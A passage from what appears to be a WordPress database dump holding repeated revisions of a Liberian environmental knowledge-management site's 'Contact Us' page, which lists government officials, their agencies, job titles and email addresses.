src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:03:31','2021-01-18 12:03:31','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3333,42,'2021-01-18 12:03:31','2021-01-18 12:03:31','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:03:31','2021-01-18 12:03:31','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3334,42,'2021-01-18 12:09:47','2021-01-18 12:09:47','','','','inherit','open','closed','','edward','','','2021-01-18 12:10:08','2021-01-18 12:10:08','',80,'https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png',0,'attachment','image/png',0),(3336,42,'2021-01-18 12:11:22','2021-01-18 12:11:22','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:11:22','2021-01-18 12:11:22','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3337,42,'2021-01-18 12:11:22','2021-01-18 12:11:22','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:11:22','2021-01-18 12:11:22','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3338,42,'2021-01-18 12:11:23','2021-01-18 12:11:23','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a 